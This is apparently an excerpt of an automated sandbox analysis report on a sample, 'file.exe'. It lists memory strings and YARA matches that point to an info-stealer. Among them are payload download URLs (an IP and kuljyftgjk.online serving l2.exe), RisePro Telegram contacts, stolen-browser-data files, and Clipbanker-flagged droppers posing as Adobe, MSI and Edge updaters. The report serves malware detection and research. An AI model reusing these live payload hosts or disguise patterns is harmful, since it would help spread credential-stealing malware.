            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.96.170/server/k/l2.exe5
            Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.96.170/server/k/l2.exeDTl
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000002.4444160556.0000000001719000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=12.205.151.60
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/z-
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com:443/demo/home.php?s=12.205.151.60
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
            Source: file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/t
            Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/12.205.151.60
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/12.205.151.60
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/
            Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/Bb
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/ons
            Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe5P#.
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exeo
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exexefN
            Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/I
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/Mi&/
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe5G
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exeJG
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exemespace
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
            Source: file.exe, 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, dZGGvSkztfgYu5jqSY21Wne.zip.0.drString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142639137.0000000006550000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drString found in binary or memory: https://t.me/risepro_bot
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot%(
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/txt
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D29080 OpenDesktopA,CreateDesktopA,

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name: .vmp#+
            Source: file.exeStatic PE information: section name: .vmp#+
            Source: file.exeStatic PE information: section name: .vmp#+
            Source: file.exeStatic PE information: section name: .vmpY[.
            Source: file.exeStatic PE information: section name: .vmpY[.
            Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4D540
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2A230
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D29A10
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D33B60
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4C990
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D41980
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D6E63B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2C760
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D81714
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D324B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D7F43E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D6E2DC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D472F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D44370
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D7C010
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D2FE50
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D6DF9A
